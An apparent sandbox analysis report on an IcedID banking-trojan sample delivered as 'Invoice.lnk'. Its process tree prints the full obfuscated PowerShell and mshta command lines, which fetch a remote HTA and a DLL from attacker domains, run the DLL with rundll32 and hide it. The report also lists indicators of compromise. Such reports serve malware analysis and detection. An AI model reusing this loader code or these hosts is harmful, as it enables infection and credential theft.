Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
06-07-2022 20:15
General
-
Target
Invoice.lnk
-
Size
168KB
-
MD5
edbd1edc29cbffb556ce1f114cce26b0
-
SHA1
272d13aacab4f01bef6291bdc6cadfa1056d7487
-
SHA256
6dedf3cf1241a2db9515459013693dc05dcb0538f99a99aa894a1cd822bac040
-
SHA512
001efa270ffd6cdb9223a34749f9f6c840efa2a4cfe226ed12cf2941c13b94da3e7ae3e60189f6f89a1bb2c5756b3657335a8fad916e4bbb04cd616d11b4a2d6
Malware Config
Extracted
http://comradespoon.com/2h.hta
Extracted
icedid
1487191074
vneastruzz.com
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Loads dropped DLL 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $UyNmTVCg = [convert]::FromBase64String('PjIv');$OikXNBFJ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYRR9ZHwMW');$krHNYSsX = -join($UyNmTVCg | % {[char] ($_ -bxor 0x77)});$QOdPilEN = -join ($OikXNBFJ | % { [char] ($_ -bxor 0x77)});sal mUkqunnT $krHNYSsX;mUkqunnT $QOdPilEN2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://comradespoon.com/2h.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function rZwKXSy($rOzLm, $DUeaQm){[IO.File]::WriteAllBytes($rOzLm, $DUeaQm)};function htljZbMQ($rOzLm){if($rOzLm.EndsWith((xoyDjKbWstoV @(72795,72849,72857,72857))) -eq $True){Start-Process (xoyDjKbWstoV @(rundll32.exe $rOzLm ,PluginInit ))}elseif($rOzLm.EndsWith((xoyDjKbWstoV @(72795,72861,72864,72798))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rOzLm}else{Start-Process $rOzLm}};function SiBubiCtqgxPeNJqDKD($rZwKXSy){$eGKnYJkKmOtohKYR=(xoyDjKbWstoV @(72821,72854,72849,72849,72850,72859));$hFlgyECaMBiw=(Get-ChildItem $rZwKXSy -Force);$hFlgyECaMBiw.Attributes=$hFlgyECaMBiw.Attributes -bor ([IO.FileAttributes]$eGKnYJkKmOtohKYR).value__};function iGSkurIwFCeyKNPHoI($zVxGUJsKPALgckmv){$EbaApiTPKvKzt = New-Object (xoyDjKbWstoV @(72827,72850,72865,72795,72836,72850,72847,72816,72857,72854,72850,72859,72865));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DUeaQm = $EbaApiTPKvKzt.DownloadData($zVxGUJsKPALgckmv);return $DUeaQm};function xoyDjKbWstoV($WvTikuTXb){$lJrjbHlZ=72749;$atMOIng=$Null;foreach($nSQChvZytQtFryr in $WvTikuTXb){$atMOIng+=[char]($nSQChvZytQtFryr-$lJrjbHlZ)};return $atMOIng};function qSYcqRJFG(){$LelVRnfNHnvRdRpfMKy = $env:ProgramData + '\';$IvwEdTB = $LelVRnfNHnvRdRpfMKy + '2.dll'; if (Test-Path -Path $IvwEdTB){htljZbMQ $IvwEdTB;}Else{ $kfGWL = iGSkurIwFCeyKNPHoI (xoyDjKbWstoV @(72853,72865,72865,72861,72807,72796,72796,72848,72860,72858,72863,72846,72849,72850,72864,72861,72860,72860,72859,72795,72848,72860,72858,72796,72799,72795,72849,72857,72857));rZwKXSy $IvwEdTB $kfGWL;htljZbMQ $IvwEdTB;};SiBubiCtqgxPeNJqDKD $IvwEdTB;;;;;}qSYcqRJFG;4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\ProgramData\2.dll PluginInit5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\2.dllFilesize
813KB
MD525d1234dd9cf6e381a71f3af53897cda
SHA1c34b42afaab68851deb4fe169ddc602106ea7869
SHA2566ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3
SHA512ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a
-
\ProgramData\2.dllFilesize
813KB
MD525d1234dd9cf6e381a71f3af53897cda
SHA1c34b42afaab68851deb4fe169ddc602106ea7869
SHA2566ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3
SHA512ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a
-
\ProgramData\2.dllFilesize
813KB
MD525d1234dd9cf6e381a71f3af53897cda
SHA1c34b42afaab68851deb4fe169ddc602106ea7869
SHA2566ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3
SHA512ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a
-
\ProgramData\2.dllFilesize
813KB
MD525d1234dd9cf6e381a71f3af53897cda
SHA1c34b42afaab68851deb4fe169ddc602106ea7869
SHA2566ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3
SHA512ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a
-
\ProgramData\2.dllFilesize
813KB
MD525d1234dd9cf6e381a71f3af53897cda
SHA1c34b42afaab68851deb4fe169ddc602106ea7869
SHA2566ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3
SHA512ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a
-
memory/568-103-0x00000000023C4000-0x00000000023C7000-memory.dmpFilesize
12KB
-
memory/568-111-0x00000000023C4000-0x00000000023C7000-memory.dmpFilesize
12KB
-
memory/568-99-0x0000000000000000-mapping.dmp
-
memory/568-101-0x000007FEF37B0000-0x000007FEF41D3000-memory.dmpFilesize
10.1MB
-
memory/568-102-0x000007FEF2C50000-0x000007FEF37AD000-memory.dmpFilesize
11.4MB
-
memory/568-104-0x00000000023CB000-0x00000000023EA000-memory.dmpFilesize
124KB
-
memory/568-112-0x00000000023CB000-0x00000000023EA000-memory.dmpFilesize
124KB
-
memory/1460-54-0x000007FEFBCD1000-0x000007FEFBCD3000-memory.dmpFilesize
8KB
-
memory/1504-105-0x0000000000000000-mapping.dmp
-
memory/1504-113-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/1588-95-0x0000000000000000-mapping.dmp
-
memory/1704-96-0x0000000002414000-0x0000000002417000-memory.dmpFilesize
12KB
-
memory/1704-94-0x000007FEF35F0000-0x000007FEF414D000-memory.dmpFilesize
11.4MB
-
memory/1704-93-0x000007FEF4150000-0x000007FEF4B73000-memory.dmpFilesize
10.1MB
-
memory/1704-88-0x0000000000000000-mapping.dmp
-
memory/1704-97-0x000000000241B000-0x000000000243A000-memory.dmpFilesize
124KB